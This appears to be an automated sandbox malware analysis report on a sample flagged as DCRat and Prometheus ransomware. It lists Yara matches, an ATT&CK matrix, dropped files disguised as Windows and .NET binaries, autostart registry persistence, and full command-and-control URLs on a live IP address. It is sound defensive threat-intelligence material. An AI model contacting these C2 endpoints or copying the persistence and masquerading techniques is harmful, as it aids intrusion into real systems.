            Source: Yara matchFile source: 0000001F.00000002.2231952684.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.2230198561.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2261381314.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000029.00000002.2635446252.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.2230198561.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2323041315.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2520255820.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2261381314.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: XPC5PMKegV.exe PID: 4924, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 6840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 5060, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 1708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 1600, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 1912, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6248, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 5204, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 6320, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 5764, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6316, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000000.00000002.2128952828.000000000315F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2323041315.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.2230480855.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.2231770511.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2209851318.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2209851318.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.2231770511.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.2231952684.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2457019815.00000000025ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2128952828.0000000003143000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.2235264042.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.2231952684.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.2230198561.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2261381314.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000029.00000002.2635446252.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.2230198561.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2323041315.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2520255820.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2261381314.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: XPC5PMKegV.exe PID: 4924, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 6840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 5060, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 1708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 1600, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 1912, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6248, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 5204, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 6320, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 5764, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6316, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts241
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		23
            Masquerading            		OS Credential Dumping241
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt31
            Registry Run Keys / Startup Folder            		31
            Registry Run Keys / Startup Folder            		151
            Virtualization/Sandbox Evasion            		Security Account Manager151
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain Credentials34
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1500508 Sample: XPC5PMKegV.exe Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Antivirus detection for URL or domain 2->47 49 12 other signatures 2->49 7 XPC5PMKegV.exe 11 27 2->7         started        11 xMLVfJVxhYAkoCJ.exe 3 2->11         started        13 Registry.exe 2->13         started        16 11 other processes 2->16 process3 dnsIp4 33 C:\Windows\...\xMLVfJVxhYAkoCJ.exe, PE32 7->33 dropped 35 C:\Users\Default\...\xMLVfJVxhYAkoCJ.exe, PE32 7->35 dropped 37 C:\Recovery\xMLVfJVxhYAkoCJ.exe, PE32 7->37 dropped 39 10 other malicious files 7->39 dropped 53 Creates an undocumented autostart registry key 7->53 55 Creates multiple autostart registry keys 7->55 57 Creates an autostart registry key pointing to binary in C:\Windows 7->57 61 2 other signatures 7->61 18 schtasks.exe 7->18         started        21 cmd.exe 1 7->21         started        23 schtasks.exe 7->23         started        25 19 other processes 7->25 59 Multi AV Scanner detection for dropped file 11->59 41 92.63.98.227, 49716, 49717, 49718 THEFIRST-ASRU Russian Federation 13->41 file5 signatures6 process7 signatures8 51 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->51 27 w32tm.exe 1 21->27         started        29 conhost.exe 21->29         started        31 xMLVfJVxhYAkoCJ.exe 21->31         started        process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            XPC5PMKegV.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            XPC5PMKegV.exe100%AviraHEUR/AGEN.1323342
            XPC5PMKegV.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe100%AviraHEUR/AGEN.1323342
            C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe100%AviraHEUR/AGEN.1323342
            C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat100%AviraBAT/Delbat.C
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe100%AviraHEUR/AGEN.1323342
            C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe100%AviraHEUR/AGEN.1323342
            C:\Program Files (x86)\Microsoft.NET\System.exe100%AviraHEUR/AGEN.1323342
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe100%AviraHEUR/AGEN.1323342
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe100%AviraHEUR/AGEN.1323342
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe100%Joe Sandbox ML
            C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\System.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Microsoft.NET\System.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\xMLVfJVxhYAkoCJ.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\xMLVfJVxhYAkoCJ.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://92.63.98.2270%Avira URL Cloudsafe
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc100%Avira URL Cloudmalware
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT100%Avira URL Cloudmalware
            http://92.63.98.227(0%Avira URL Cloudsafe
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e100%Avira URL Cloudmalware
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN100%Avira URL Cloudmalware
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44100%Avira URL Cloudmalware
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN100%Avira URL Cloudmalware
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA100%Avira URL Cloudmalware
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Unive0%Avira URL Cloudsafe
            http://go.mic50%Avira URL Cloudsafe
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r100%Avira URL Cloudmalware
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bctrue
            • Avira URL Cloud: malware
            		unknown
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchNtrue
            • Avira URL Cloud: malware
            		unknown
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGTtrue
            • Avira URL Cloud: malware
            		unknown
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44true
            • Avira URL Cloud: malware
            		unknown
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0etrue
            • Avira URL Cloud: malware
            		unknown
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdNtrue
            • Avira URL Cloud: malware
            		unknown
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgAtrue
            • Avira URL Cloud: malware
            		unknown
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0rtrue
            • Avira URL Cloud: malware
            		unknown
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlMtrue
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/UnivexMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
